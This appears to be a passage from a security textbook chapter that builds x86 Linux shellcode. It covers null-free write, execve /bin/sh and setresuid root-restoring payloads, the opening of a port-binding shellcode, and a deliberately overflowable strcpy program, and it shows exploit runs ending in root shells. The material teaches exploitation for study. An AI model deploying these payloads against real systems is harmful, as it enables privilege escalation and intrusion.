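`and <dest>, <source>`	Performs a bitwise and logic operation, comparing each bit of one operand with the corresponding bit of the other operand (1 and 0 = 0; 1 and 1 = 1; 0 and 1 = 0; 0 and 0 = 0). The result bit is on only if both the source bit and the destination bit are on. The final result is stored in the destination operand.
`xor <dest>, <source>`	Performs a bitwise exclusive or (xor) logic operation, comparing each bit of one operand with the corresponding bit of the other operand (1 xor 0 = 1; 1 xor 1 = 0; 0 xor 1 = 1; 0 xor 0 = 0). If the bits differ, the result bit is on; if the bits are the same, the result bit is off. The final result is stored in the destination operand.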

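One method is to move an arbitrary 32-bit number into the register and then subtract that same value from the register, using the mov and sub instructions: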

	B8 44 33 22 11        mov eax,0x11223344
	2D 44 33 22 11        sub eax,0x11223344

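While this technique works, it takes 10 bytes to zero out a single register, making the assembled shellcode larger than necessary. Can you think of a way to optimize this technique? The DWORD value specified in each instruction makes up 80 percent of the code. Subtracting any value from itself also produces 0 and doesn't require any static data. This can be done with a single two-byte instruction: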

	29 C0               sub eax,eax

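Using the sub instruction works fine when zeroing registers at the beginning of shellcode. It does modify the processor flags, which are used for branching, so it should not sit between a comparison and the branch that depends on it. There is also a preferred two-byte instruction that is used to zero registers in most shellcode. The xor instruction performs an exclusive or operation on the bits in a register. Since 1 xor 1 results in 0, and 0 xor 0 results in 0, any value xored with itself results in 0. This is the same result as with any value subtracted from itself. Note that xor updates the processor flags as well (it clears the carry and overflow flags and sets the zero flag when the result is 0), so the preference for it is a matter of convention rather than of flag safety.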

	31 C0                 xor eax,eax
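The truth tables for or, and, and xor, and the fact that a value cancels itself under both sub and xor, can be checked with C's bitwise operators. This is only a sketch: the function names are hypothetical, and the operands 0xC (binary 1100) and 0xA (binary 1010) are chosen because together they cover all four bit combinations.

```c
#include <stdint.h>

/* Bitwise or, and, and xor, as performed by the instructions of the same name. */
uint32_t apply_or(uint32_t dest, uint32_t source)  { return dest | source; }
uint32_t apply_and(uint32_t dest, uint32_t source) { return dest & source; }
uint32_t apply_xor(uint32_t dest, uint32_t source) { return dest ^ source; }

/* Model "sub reg, reg": any value minus itself is 0. */
uint32_t zero_by_sub(uint32_t reg) { return reg - reg; }

/* Model "xor reg, reg": every bit xored with itself is 0. */
uint32_t zero_by_xor(uint32_t reg) { return reg ^ reg; }
```

With those operands, or gives 1110 (0xE), and gives 1000 (0x8), and xor gives 0110 (0x6), while both zeroing functions return 0 for any input.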

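You can safely use the sub instruction to zero registers (if done at the beginning of the shellcode), but the xor instruction is most commonly used in shellcode in the wild. This next revision of the shellcode makes use of the smaller registers and the xor instruction to avoid null bytes. The inc and dec instructions have also been used when possible to make for even smaller shellcode.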

helloworld3.s

BITS 32             ;  Tell nasm this is 32-bit code.

jmp short one       ;  Jump down to a call at the end.

two:
; ssize_t write(int fd,  const void *buf, size_t count);
  pop ecx           ; Pop  the return address (string ptr) into ecx.
  xor eax, eax      ; Zero  out full 32 bits of eax register.
  mov al, 4         ; Write  syscall #4 to the low byte of eax.
  xor ebx, ebx      ; Zero out ebx.
  inc ebx           ; Increment ebx to 1,  STDOUT file descriptor.
  xor edx, edx
  mov dl, 15        ; Length of the string
  int 0x80          ; Do syscall: write(1, string, 15)

; void _exit(int status);
  mov al, 1        ; Exit syscall #1, the top 3 bytes are still zeroed.
  dec ebx          ; Decrement ebx back down to 0 for status = 0.
  int 0x80         ; Do syscall: exit(0)

one:
  call two   ; Call back upwards to avoid null bytes
  db "Hello, world!", 0x0a, 0x0d  ; with newline and carriage return bytes.

After assembling this shellcode, hexdump and grep are used to quickly check it for null bytes.

reader@hacking:~/booksrc $ nasm helloworld3.s
reader@hacking:~/booksrc $ hexdump -C helloworld3 | grep --color=auto 00
00000000  eb 13 59 31 c0 b0 04 31  db 43 31 d2 b2 0f cd 80  |..Y1...1.C1.....|
00000010  b0 01 4b cd 80 e8 e8 ff  ff ff 48 65 6c 6c 6f 2c  |..K.......Hello,|
00000020  20 77 6f 72 6c 64 21 0a  0d                       | world!..|
00000029
reader@hacking:~/booksrc $
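The same check can be done programmatically. The sketch below scans a byte buffer and reports where the first null byte sits; `first_null_offset` is a hypothetical helper, not a tool from the book.

```c
#include <stddef.h>
#include <stdint.h>

/* Return the offset of the first 0x00 byte in buf, or -1 if there is none. */
long first_null_offset(const uint8_t *buf, size_t len)
{
    for (size_t i = 0; i < len; i++)
        if (buf[i] == 0x00)
            return (long)i;
    return -1;
}
```

Run over `B8 04 00 00 00` (mov eax,0x4) it returns 2; run over `31 C0 B0 04` (xor eax,eax followed by mov al,0x4) it returns -1, since that sequence contains no null bytes.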

Now this shellcode is usable, as it doesn't contain any null bytes. When used with an exploit, the notesearch program is coerced into greeting the world like a newbie.

reader@hacking:~/booksrc $ export SHELLCODE=$(cat helloworld3)
reader@hacking:~/booksrc $ ./getenvaddr SHELLCODE ./notesearch
SHELLCODE will be at 0xbffff9bc
reader@hacking:~/booksrc $ ./notesearch $(perl -e 'print "\xbc\xf9\xff\xbf"x40')
[DEBUG] found a 33 byte note for user id 999
-------[ end of note data ]-------
Hello, world!
reader@hacking:~/booksrc $

Shell-Spawning Shellcode

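Now that you've learned how to make system calls and avoid null bytes, all sorts of shellcodes can be constructed. To spawn a shell, we just need to make a system call to execute the /bin/sh shell program. System call number 11, execve(), is similar to the C execute() function that we used in the previous chapters.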

EXECVE(2)                  Linux Programmer's Manual                 EXECVE(2)

NAME
       execve - execute program

SYNOPSIS
       #include <unistd.h>

       int execve(const char *filename, char *const argv[],
                  char *const envp[]);

DESCRIPTION
       execve() executes the program pointed to by filename. Filename must be
       either a binary executable, or a script starting with a line of  the
       form  "#! interpreter [arg]". In the latter case, the interpreter must
       be a valid pathname for an executable which is not itself a  script,
       which will be invoked as interpreter [arg] filename.

       argv is an array of argument strings passed to the new program. envp
       is an array of strings, conventionally of the form key=value, which are
       passed as environment to the new program. Both argv and envp must be
       terminated by a null pointer. The argument vector and environment can
       be accessed by the called program's main function, when it is defined
       as int main(int argc, char *argv[], char *envp[]).

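The first argument, the filename, should be a pointer to the string "/bin/sh", since this is what we want to execute. The environment array (the third argument) can be empty, but it still needs to be terminated with a 32-bit null pointer. The argument array (the second argument) must be null-terminated, too; it must also contain the string pointer (since the zeroth argument is the name of the running program). Done in C, a program making this call would look like this: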

exec_shell.c

#include <unistd.h>

int main() {
  char filename[] = "/bin/sh\x00";
  char *argv[2]; // Argument array: char pointers, null terminated
  char *envp[1]; // Environment array: holds only the null terminator

  argv[0] = filename; // The only argument is filename.
  argv[1] = 0;  // Null terminate the argument array.

  envp[0] = 0; // Null terminate the environment array.

  execve(filename, argv, envp);
  return 1; // Only reached if execve() fails.
}

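To do this in assembly, the argument and environment arrays need to be built in memory. In addition, the "/bin/sh" string needs to be terminated with a null byte. This must be built in memory as well. Dealing with memory in assembly is similar to using pointers in C. The lea instruction, whose name stands for load effective address, works like the address-of operator in C.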

Instruction	Description
`lea <dest>, <source>`	Loads the effective address of the source operand into the destination operand.

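With Intel assembly syntax, operands can be dereferenced as pointers if they are surrounded by square brackets. For example, the following instruction in assembly will treat EBX+12 as a pointer and write eax to where it's pointing.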

	89 43 0C             mov [ebx+12],eax

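The following shellcode uses these new instructions to build the execve() arguments in memory. The environment array is collapsed into the end of the argument array, so they share the same 32-bit null terminator.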

exec_shell.s

BITS 32

  jmp short two     ; Jump down to the bottom for the call trick.
one:
; int execve(const char *filename, char *const argv [], char *const envp[])
  pop ebx           ; Ebx has the addr of the string.
  xor eax, eax      ; Put 0 into eax.
  mov [ebx+7], al   ; Null terminate the /bin/sh string.
  mov [ebx+8], ebx  ; Put addr from ebx where the AAAA is.
  mov [ebx+12], eax ; Put 32-bit null terminator where the BBBB is.
  lea ecx, [ebx+8]  ; Load the address of [ebx+8] into ecx for argv ptr.
  lea edx, [ebx+12] ; Edx = ebx + 12, which is the envp ptr.
  mov al, 11        ; Syscall #11
  int 0x80          ; Do it.

two:
  call one          ; Use a call to get string address.
  db '/bin/shXAAAABBBB'     ; The XAAAABBBB bytes aren't needed.

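After terminating the string and building the arrays, the shellcode uses the lea instruction to put a pointer to the argument array into the ECX register. Loading the effective address of a bracketed register added to a value is an efficient way to add the value to the register and store the result in another register. In the example above, the brackets dereference EBX+8 as the argument to lea, which loads that address into ECX. Loading the address of a dereferenced pointer produces the original pointer, so this instruction puts EBX+8 into ECX. Normally, this would require both a mov and an add instruction. When assembled, this shellcode is devoid of null bytes. It will spawn a shell when used in an exploit.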
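The memory layout that exec_shell.s builds over the XAAAABBBB placeholder can be traced in C. This is a sketch under stated assumptions: `base` stands in for the 32-bit address that pop ebx would deliver, and the struct and function names are invented here. Nothing is executed; the code only fills a 16-byte buffer the way the three mov instructions would and computes what the two lea instructions would load.

```c
#include <stdint.h>
#include <string.h>

/* Register values the shellcode hands to execve(). */
struct execve_args {
    uint32_t filename;  /* ebx */
    uint32_t argv;      /* ecx */
    uint32_t envp;      /* edx */
};

/* Store a 32-bit value in little-endian order, as x86 does. */
static void store32(uint8_t *p, uint32_t v)
{
    p[0] = (uint8_t)(v & 0xFF);
    p[1] = (uint8_t)((v >> 8) & 0xFF);
    p[2] = (uint8_t)((v >> 16) & 0xFF);
    p[3] = (uint8_t)((v >> 24) & 0xFF);
}

/* Fill block as exec_shell.s does; base is the assumed address of block[0]. */
struct execve_args build_execve_block(uint8_t block[16], uint32_t base)
{
    struct execve_args regs;

    memcpy(block, "/bin/shXAAAABBBB", 16);
    block[7] = 0;               /* mov [ebx+7], al   : terminate "/bin/sh" */
    store32(block + 8, base);   /* mov [ebx+8], ebx  : argv[0] = string    */
    store32(block + 12, 0);     /* mov [ebx+12], eax : shared null pointer */

    regs.filename = base;       /* pop ebx           */
    regs.argv = base + 8;       /* lea ecx, [ebx+8]  */
    regs.envp = base + 12;      /* lea edx, [ebx+12] */
    return regs;
}
```

The argument array occupies bytes 8 through 15 (one pointer plus the null), and the environment array is just the null at bytes 12 through 15, so the two arrays overlap on the same terminator.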

reader@hacking:~/booksrc $ nasm exec_shell.s
reader@hacking:~/booksrc $ wc -c exec_shell
36 exec_shell
reader@hacking:~/booksrc $ hexdump -C exec_shell
00000000  eb 16 5b 31 c0 88 43 07  89 5b 08 89 43 0c 8d 4b  |..[1..C..[..C..K|
00000010  08 8d 53 0c b0 0b cd 80  e8 e5 ff ff ff 2f 62 69  |..S........../bi|
00000020  6e 2f 73 68                                       |n/sh|
00000024
reader@hacking:~/booksrc $ export SHELLCODE=$(cat exec_shell)
reader@hacking:~/booksrc $ ./getenvaddr SHELLCODE ./notesearch
SHELLCODE will be at 0xbffff9c0
reader@hacking:~/booksrc $ ./notesearch $(perl -e 'print "\xc0\xf9\xff\xbf"x40')
[DEBUG] found a 34 byte note for user id 999
[DEBUG] found a 41 byte note for user id 999
[DEBUG] found a 5 byte note for user id 999
[DEBUG] found a 35 byte note for user id 999
[DEBUG] found a 9 byte note for user id 999
[DEBUG] found a 33 byte note for user id 999
-------[ end of note data ]-------
sh-3.2# whoami
root
sh-3.2#

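This shellcode, however, can be shortened to less than the current 45 bytes. Since shellcode needs to be injected into program memory somewhere, smaller shellcode can be used in tighter exploit situations with smaller usable buffers. The smaller the shellcode, the more situations it can be used in. Obviously, the XAAAABBBB visual aid can be trimmed from the end of the string, which brings the shellcode down to 36 bytes.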

reader@hacking:~/booksrc/shellcodes $ hexdump -C exec_shell
00000000  eb 16 5b 31 c0 88 43 07  89 5b 08 89 43 0c 8d 4b  |..[1..C..[..C..K|
00000010  08 8d 53 0c b0 0b cd 80  e8 e5 ff ff ff 2f 62 69  |..S........../bi|
00000020  6e 2f 73 68                                       |n/sh|
00000024
reader@hacking:~/booksrc/shellcodes $ wc -c exec_shell
36 exec_shell
reader@hacking:~/booksrc/shellcodes $

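This shellcode can be shrunk down further by redesigning it and using registers more efficiently. The ESP register is the stack pointer, pointing to the top of the stack. When a value is pushed to the stack, ESP is moved up in memory (by subtracting 4, toward lower addresses) and the value is placed at the top of the stack. When a value is popped from the stack, the pointer in ESP is moved down in memory (by adding 4).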

The following shellcode uses push instructions to build the necessary structures in memory for the execve() system call.

tiny_shell.s

BITS 32

; execve(const char *filename, char *const argv [], char *const envp[])
  xor eax, eax      ; Zero out eax.
  push eax          ; Push some nulls for string termination.
  push 0x68732f2f   ; Push "//sh" to the stack.
  push 0x6e69622f   ; Push "/bin" to the stack.
  mov ebx, esp      ; Put the address of "/bin//sh" into ebx, via esp.
  push eax          ; Push 32-bit null terminator to stack.
  mov edx, esp      ; This is an empty array for envp.
  push ebx          ; Push string addr to stack above null terminator.
  mov ecx, esp      ; This is the argv array with string ptr.
  mov al, 11        ; Syscall #11.
  int 0x80          ; Do it.

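This shellcode builds the null-terminated string "/bin//sh" on the stack, and then copies ESP for the pointer. The extra slash doesn't matter and is effectively ignored. The same method is used to build the arrays for the remaining arguments. The resulting shellcode still spawns a shell but is only 25 bytes, compared to 36 bytes using the jmp call method.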
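The way three pushes produce a usable string can be modeled with a small downward-growing stack in C. This is an illustrative sketch: the `stack_model` type and its helpers are hypothetical, and `esp` is an index into a local array rather than a real stack pointer.

```c
#include <stdint.h>
#include <string.h>

#define STACK_SIZE 64

/* A toy stack: esp is an offset into mem and moves toward 0 on each push. */
struct stack_model {
    uint8_t mem[STACK_SIZE];
    uint32_t esp;
};

void stack_init(struct stack_model *s)
{
    memset(s->mem, 0xCC, STACK_SIZE);  /* filler standing in for old stack data */
    s->esp = STACK_SIZE;
}

/* Model "push imm32": subtract 4 from esp, then store little-endian. */
void push32(struct stack_model *s, uint32_t v)
{
    s->esp -= 4;
    s->mem[s->esp + 0] = (uint8_t)(v & 0xFF);
    s->mem[s->esp + 1] = (uint8_t)((v >> 8) & 0xFF);
    s->mem[s->esp + 2] = (uint8_t)((v >> 16) & 0xFF);
    s->mem[s->esp + 3] = (uint8_t)((v >> 24) & 0xFF);
}

/* Repeat the first three pushes of tiny_shell.s; return what ebx would point to. */
const char *build_path(struct stack_model *s)
{
    push32(s, 0);            /* push eax (zeroed): string terminator */
    push32(s, 0x68732f2f);   /* "//sh" */
    push32(s, 0x6e69622f);   /* "/bin" */
    return (const char *)&s->mem[s->esp];
}
```

Because each doubleword is stored least significant byte first and later pushes land at lower addresses, reading upward from `esp` gives "/bin", then "//sh", then the zero doubleword.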

reader@hacking:~/booksrc $ nasm tiny_shell.s 
reader@hacking:~/booksrc $ wc -c tiny_shell
25 tiny_shell
reader@hacking:~/booksrc $ hexdump -C tiny_shell
00000000  31 c0 50 68 2f 2f 73 68  68 2f 62 69 6e 89 e3 50  |1.Ph//shh/bin..P|
00000010  89 e2 53 89 e1 b0 0b cd  80                       |..S......|
00000019
reader@hacking:~/booksrc $ export SHELLCODE=$(cat tiny_shell)
reader@hacking:~/booksrc $ ./getenvaddr SHELLCODE ./notesearch
SHELLCODE will be at 0xbffff9cb
reader@hacking:~/booksrc $ ./notesearch $(perl -e 'print "\xcb\xf9\xff\xbf"x40')
[DEBUG] found a 34 byte note for user id 999
[DEBUG] found a 41 byte note for user id 999
[DEBUG] found a 5 byte note for user id 999
[DEBUG] found a 35 byte note for user id 999
[DEBUG] found a 9 byte note for user id 999
[DEBUG] found a 33 byte note for user id 999
-------[ end of note data ]-------
sh-3.2#

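A Matter of Privilege

To help mitigate rampant privilege escalation, some privileged processes will lower their effective privileges while doing things that don't require that kind of access. This can be done with the seteuid() function, which sets the effective user ID. By changing the effective user ID, the privileges of the process can be changed. The manual page for the seteuid() function is shown below.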

SETEGID(2)                 Linux Programmer's Manual                SETEGID(2)

NAME
       seteuid, setegid - set effective user or group ID

SYNOPSIS
       #include <sys/types.h>
       #include <unistd.h>

       int seteuid(uid_t euid);
       int setegid(gid_t egid);

DESCRIPTION
       seteuid() sets the effective user ID of the current process.
       Unprivileged user processes may only set the effective user ID to the
       real user ID, the effective user ID or the saved set-user-ID.
       Precisely the same holds for setegid() with "group" instead of "user".

RETURN VALUE
       On success, zero is returned. On error, -1 is returned, and errno is
       set appropriately.

This function is used by the following code to drop privileges down to those of the "games" user before the vulnerable strcpy() call.

drop_privs.c

#include <string.h>
#include <unistd.h>
void lowered_privilege_function(char *ptr) {
   char buffer[50];
   seteuid(5);  // Drop privileges to games user.
   strcpy(buffer, ptr);  // Deliberately unchecked copy: the overflow under study.
}
int main(int argc, char *argv[]) {
   if (argc > 1)  // argv[1] exists only when an argument was supplied.
      lowered_privilege_function(argv[1]);
}

Even though this compiled program is setuid root, the privileges are dropped to the games user before the shellcode can execute. This only spawns a shell for the games user, without root access.

reader@hacking:~/booksrc $ gcc -o drop_privs drop_privs.c
reader@hacking:~/booksrc $ sudo chown root ./drop_privs; sudo chmod u+s ./drop_privs
reader@hacking:~/booksrc $ export SHELLCODE=$(cat tiny_shell)
reader@hacking:~/booksrc $ ./getenvaddr SHELLCODE ./drop_privs
SHELLCODE will be at 0xbffff9cb
reader@hacking:~/booksrc $ ./drop_privs $(perl -e 'print "\xcb\xf9\xff\xbf"x40')
sh-3.2$ whoami
games
sh-3.2$ id
uid=999(reader) gid=999(reader) euid=5(games)
groups=4(adm),20(dialout),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),104(scanner),112(netdev),113(lpadmin),115(powerdev),117(admin),999(reader)
sh-3.2$

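Fortunately, the privileges can easily be restored at the beginning of our shellcode with a system call to set the privileges back to root. The most complete way to do this is with a setresuid() system call, which sets the real, effective, and saved user IDs. The system call number and manual page are shown below.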

reader@hacking:~/booksrc $ grep -i setresuid /usr/include/asm-i386/unistd.h
`#define __NR_setresuid          164`
#define __NR_setresuid32        208
reader@hacking:~/booksrc $ man 2 setresuid
 SETRESUID(2)               Linux Programmer's Manual              SETRESUID(2)

NAME
       setresuid, setresgid - set real, effective and saved user or group ID

SYNOPSIS
       #define _GNU_SOURCE
       #include <unistd.h>

       int setresuid(uid_t ruid, uid_t euid, uid_t suid);
       int setresgid(gid_t rgid, gid_t egid, gid_t sgid);

DESCRIPTION
       setresuid() sets the real user ID, the effective user ID, and the saved
       set-user-ID of the current process.

The following shellcode makes a call to setresuid() before spawning the shell to restore root privileges.

priv_shell.s

BITS 32

; setresuid(uid_t ruid, uid_t euid, uid_t suid);
  xor eax, eax      ; Zero out eax.
  xor ebx, ebx      ; Zero out ebx.
  xor ecx, ecx      ; Zero out ecx.
  xor edx, edx      ; Zero out edx.
  mov al,  0xa4     ; 164 (0xa4) for syscall #164
  int 0x80          ; setresuid(0, 0, 0)  Restore all root privs.

; execve(const char *filename, char *const argv [], char *const envp[])
  xor eax, eax      ; Make sure eax is zeroed again.
  mov al, 11        ; syscall #11
  push ecx          ; push some nulls for string termination.
  push 0x68732f2f   ; push "//sh" to the stack.
  push 0x6e69622f   ; push "/bin" to the stack.
  mov ebx, esp      ; Put the address of "/bin//sh" into ebx via esp.
  push ecx          ; push 32-bit null terminator to stack.
  mov edx, esp      ; This is an empty array for envp.
  push ebx          ; push string addr to stack above null terminator.
  mov ecx, esp      ; This is the argv array with string ptr.
  int 0x80          ; execve("/bin//sh", ["/bin//sh", NULL], [NULL])

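This way, even if a program is running under lowered privileges when it's exploited, the shellcode can restore the privileges. This effect is demonstrated below by exploiting the same program with dropped privileges.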

reader@hacking:~/booksrc $ nasm priv_shell.s
reader@hacking:~/booksrc $ export SHELLCODE=$(cat priv_shell)
reader@hacking:~/booksrc $ ./getenvaddr SHELLCODE ./drop_privs
SHELLCODE will be at 0xbffff9bf
reader@hacking:~/booksrc $ ./drop_privs $(perl -e 'print "\xbf\xf9\xff\xbf"x40')
sh-3.2# whoami
root
sh-3.2# id
uid=0(root) gid=999(reader)
groups=4(adm),20(dialout),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),104(scanner),112(netdev),113(lpadmin),115(powerdev),117(admin),999(reader)
sh-3.2#

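And Smaller Still

A few more bytes can still be shaved off this shellcode. There is a single-byte x86 instruction called cdq, which stands for convert doubleword to quadword. Instead of using operands, this instruction always gets its source from the EAX register and stores the results across the EDX and EAX registers. Since the registers are 32-bit doublewords, it takes two registers to store a 64-bit quadword. The conversion is simply a matter of extending the sign bit from a 32-bit integer to a 64-bit integer. Operationally, this means that if the sign bit of EAX is 0, the cdq instruction will zero the EDX register. Using xor to zero the EDX register requires two bytes; so, if EAX is already zeroed, using the cdq instruction to zero EDX will save one byte: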

	`31 D2`            xor edx,edx

compared to

	`99`               cdq

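Another byte can be saved with clever use of the stack. Since the stack is 32-bit aligned, a single byte value pushed to the stack is stored as a doubleword: the push sign-extends the byte to 32 bits, so when the value is popped off, it fills the entire register. The instructions that push a single byte and pop it back into a register take three bytes, while using xor to zero the register and moving a single byte takes four bytes: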

	`31 C0`            xor eax,eax
	`B0 0B`            mov al,0xb

compared to

	`6A 0B`            push byte +0xb
	`58`               pop eax
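Both tricks rest on sign extension, which can be modeled in C. The names `cdq_edx` and `push_byte_pop` are hypothetical; the sketch assumes only what the text states: cdq copies the sign bit of EAX into every bit of EDX, and a pushed byte is sign-extended to 32 bits.

```c
#include <stdint.h>

/* Model cdq: EDX becomes all ones if the sign bit of EAX is set, else 0. */
uint32_t cdq_edx(uint32_t eax)
{
    return (eax & 0x80000000u) ? 0xFFFFFFFFu : 0x00000000u;
}

/* Model "push BYTE imm8" followed by "pop reg": the byte is sign-extended
 * to a doubleword, so the register receives all 32 bits. */
uint32_t push_byte_pop(int8_t imm)
{
    return (uint32_t)(int32_t)imm;
}
```

For 11 (0x0b) the popped register is 0x0000000b, but a byte with its top bit set, such as 0xa4 (-92 as a signed byte), would come back as 0xffffffa4. That limits the push/pop trick to values from 0 to 127 when the upper bytes must be zero.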

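These tricks (the cdq instruction and the push/pop pair) are used in the following shellcode listing. This assembles into the same shellcode as that used in the previous chapters.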

shellcode.s

BITS 32

; setresuid(uid_t ruid, uid_t euid, uid_t suid);
  xor eax, eax      ; Zero out eax.
  xor ebx, ebx      ; Zero out ebx.
  xor ecx, ecx      ; Zero out ecx.
  cdq               ; Zero out edx using the sign bit from eax.
  mov BYTE al, 0xa4 ; syscall 164 (0xa4)
  int 0x80          ; setresuid(0, 0, 0)  Restore all root privs.

; execve(const char *filename, char *const argv [], char *const envp[])
  push BYTE 11      ; push 11 to the stack.
  pop eax           ; pop the dword of 11 into eax.
  push ecx          ; push some nulls for string termination.
  push 0x68732f2f   ; push "//sh" to the stack.
  push 0x6e69622f   ; push "/bin" to the stack.
  mov ebx, esp      ; Put the address of "/bin//sh" into ebx via esp.
  push ecx          ; push 32-bit null terminator to stack.
  mov edx, esp      ; This is an empty array for envp.
  push ebx          ; push string addr to stack above null terminator.
  mov ecx, esp      ; This is the argv array with string ptr.
  int 0x80          ; execve("/bin//sh", ["/bin//sh", NULL], [NULL])

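The syntax for pushing a single byte requires the size to be declared. Valid sizes are BYTE for one byte, WORD for two bytes, and DWORD for four bytes. These sizes can be implied from register widths, so moving into the AL register implies the BYTE size. While it's not necessary to use a size in all situations, it doesn't hurt and can help readability.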

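Port-Binding Shellcode

When exploiting a remote program, the shellcode we've designed so far won't work. The injected shellcode needs to communicate over the network to deliver an interactive root prompt. Port-binding shellcode will bind the shell to a network port where it listens for incoming connections. In the previous chapter, we used this kind of shellcode to exploit the tinyweb server. The following C code binds to port 31337 and listens for a TCP connection.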

bind_port.c

#include <unistd.h>
#include <string.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>

int main(void) {
   int sockfd, new_sockfd;  // Listen on sock_fd, new connection on new_fd
   struct sockaddr_in host_addr, client_addr;   // My address information
   socklen_t sin_size;
   int yes=1;

   sockfd = socket(PF_INET, SOCK_STREAM, 0);

   host_addr.sin_family = AF_INET;         // Host byte order
   host_addr.sin_port = htons(31337);      // Short, network byte order
   host_addr.sin_addr.s_addr = INADDR_ANY; // Automatically fill with my IP.
   memset(&(host_addr.sin_zero), '\0', 8); // Zero the rest of the struct.

   bind(sockfd, (struct sockaddr *)&host_addr, sizeof(struct sockaddr));

   listen(sockfd, 4);
   sin_size = sizeof(struct sockaddr_in);
   new_sockfd = accept(sockfd, (struct sockaddr *)&client_addr, &sin_size);
}

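These familiar socket functions can all be accessed with a single Linux system call, aptly named socketcall(). This is syscall number 102, which has a slightly cryptic manual page.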

reader@hacking:~/booksrc $ grep socketcall /usr/include/asm-i386/unistd.h
#define __NR_socketcall         102
reader@hacking:~/booksrc $ man 2 socketcall
IPC(2)                     Linux Programmer's Manual                     IPC(2)

NAME
       socketcall - socket system calls

SYNOPSIS
       int socketcall(int call, unsigned long *args);

DESCRIPTION
       socketcall() is a common kernel entry point for the socket system calls. call
       determines which socket function to invoke. args points to a block containing
       the actual arguments, which are passed through to the appropriate call.

       User programs should call  the  appropriate  functions  by  their  usual
       names.   Only  standard  library implementors and kernel hackers need to
       know about socketcall().

The possible call numbers for the first argument are listed in the linux/net.h include file.

From /usr/include/linux/net.h

#define SYS_SOCKET  1   /* sys_socket(2)    */
#define SYS_BIND  2   /* sys_bind(2)      */
#define SYS_CONNECT 3   /* sys_connect(2)   */
#define SYS_LISTEN  4   /* sys_listen(2)    */
#define SYS_ACCEPT  5   /* sys_accept(2)    */
#define SYS_GETSOCKNAME 6   /* sys_getsockname(2)   */
#define SYS_GETPEERNAME 7   /* sys_getpeername(2)   */
#define SYS_SOCKETPAIR  8   /* sys_socketpair(2)    */
#define SYS_SEND  9   /* sys_send(2)      */
#define SYS_RECV  10    /* sys_recv(2)      */
#define SYS_SENDTO  11    /* sys_sendto(2)    */
#define SYS_RECVFROM  12    /* sys_recvfrom(2)    */
#define SYS_SHUTDOWN  13    /* sys_shutdown(2)    */
#define SYS_SETSOCKOPT  14    /* sys_setsockopt(2)    */
#define SYS_GETSOCKOPT  15    /* sys_getsockopt(2)    */
#define SYS_SENDMSG 16    /* sys_sendmsg(2)   */
#define SYS_RECVMSG 17    /* sys_recvmsg(2)   */

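So, to make socket system calls using Linux, EAX is always 102 for socketcall(), EBX contains the type of socket call, and ECX is a pointer to the socket call's arguments. The calls are simple enough, but some of them require a sockaddr structure, which must be built by the shellcode. Debugging the compiled C code is the most direct way to look at this structure in memory.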

reader@hacking:~/booksrc $ gcc -g bind_port.c
reader@hacking:~/booksrc $ gdb -q ./a.out
Using host libthread_db library "/lib/tls/i686/cmov/libthread_db.so.1".
(gdb) list 18
13         sockfd = socket(PF_INET, SOCK_STREAM, 0);
14
15         host_addr.sin_family = AF_INET;         // Host byte order
16         host_addr.sin_port = htons(31337);      // Short, network byte order
17         host_addr.sin_addr.s_addr = INADDR_ANY; // Automatically fill with my IP.
18         memset(&(host_addr.sin_zero), '\0', 8); // Zero the rest of the struct.
19
20         bind(sockfd, (struct sockaddr *)&host_addr, sizeof(struct sockaddr));
21
22         listen(sockfd, 4);
(gdb) break 13
Breakpoint 1 at 0x804849b: file bind_port.c, line 13.
(gdb) break 20
Breakpoint 2 at 0x80484f5: file bind_port.c, line 20.
(gdb) run
Starting program: /home/reader/booksrc/a.out

Breakpoint 1, main () at bind_port.c:13
13         sockfd = socket(PF_INET, SOCK_STREAM, 0);
(gdb) x/5i $eip
0x804849b <main+23>:    mov    DWORD PTR [esp+8],0x0
0x80484a3 <main+31>:    mov    DWORD PTR [esp+4],0x1
0x80484ab <main+39>:    mov    DWORD PTR [esp],0x2
0x80484b2 <main+46>:    call   0x8048394 <socket@plt>
0x80484b7 <main+51>:    mov    DWORD PTR [ebp-12],eax
(gdb)

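The first breakpoint is just before the socket call happens, since we need to check the values of PF_INET and SOCK_STREAM. All three arguments are placed on the stack in reverse order (but with mov instructions rather than pushes). This means PF_INET is 2 and SOCK_STREAM is 1.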

(gdb) cont
Continuing.

Breakpoint 2, main () at bind_port.c:20
20         bind(sockfd, (struct sockaddr *)&host_addr, sizeof(struct sockaddr));
(gdb) print host_addr
$1 = {sin_family = 2, sin_port = 27002, sin_addr = {s_addr = 0},
  sin_zero = "\000\000\000\000\000\000\000"}
(gdb) print sizeof(struct sockaddr)
$2 = 16
(gdb) x/16xb &host_addr
0xbffff780:     `0x02    0x00    0x7a    0x69    0x00    0x00    0x00    0x00`
0xbffff788:     0x00    0x00    0x00    0x00    0x00    0x00    0x00    0x00
(gdb) p /x 27002
$3 = 0x697a
(gdb) p 0x7a69
$4 = 31337
(gdb)

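The next breakpoint happens after the sockaddr structure is filled with values. The debugger is smart enough to decode the elements of the structure when host_addr is printed, but now you need to be smart enough to realize the port is stored in network byte order. The sin_family and sin_port elements are both words (16 bits each), followed by the address as a DWORD. In this case, the address is 0, which means any address can be used for binding. The remaining eight bytes after that are just extra space in the structure. The first eight bytes in the structure (shown in bold) contain all the important information.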
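The byte-order detail is easy to get wrong, so here is a sketch that rebuilds the first eight bytes of the structure by hand. The function names are hypothetical, and the code assumes the x86 layout seen in the debugger: sin_family stored little-endian, sin_port stored big-endian (network order), and a zero address.

```c
#include <stdint.h>

/* Write the first eight bytes of a sockaddr_in as they appear in x86 memory. */
void build_sockaddr_prefix(uint8_t out[8], uint16_t family, uint16_t port)
{
    out[0] = (uint8_t)(family & 0xFF);   /* sin_family, host (little-endian) order */
    out[1] = (uint8_t)(family >> 8);
    out[2] = (uint8_t)(port >> 8);       /* sin_port, network (big-endian) order */
    out[3] = (uint8_t)(port & 0xFF);
    out[4] = 0;                          /* sin_addr = INADDR_ANY */
    out[5] = 0;
    out[6] = 0;
    out[7] = 0;
}

/* The value an x86 program sees when it reads the stored port as a 16-bit word. */
uint16_t port_as_x86_word(uint16_t port)
{
    return (uint16_t)((port << 8) | (port >> 8));
}
```

For family 2 and port 31337 (0x7a69) this yields 02 00 7a 69 00 00 00 00, and `port_as_x86_word(31337)` is 0x697a, or 27002, the value gdb printed for sin_port.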

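The following assembly instructions perform all the socket calls needed to bind to port 31337 and accept TCP connections. The sockaddr structure and the argument arrays are each created by pushing values in reverse order to the stack and then copying ESP into ECX. The last eight bytes of the sockaddr structure aren't actually pushed to the stack, since they aren't used. Whatever random eight bytes happen to be on the stack will occupy this space, which is fine.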

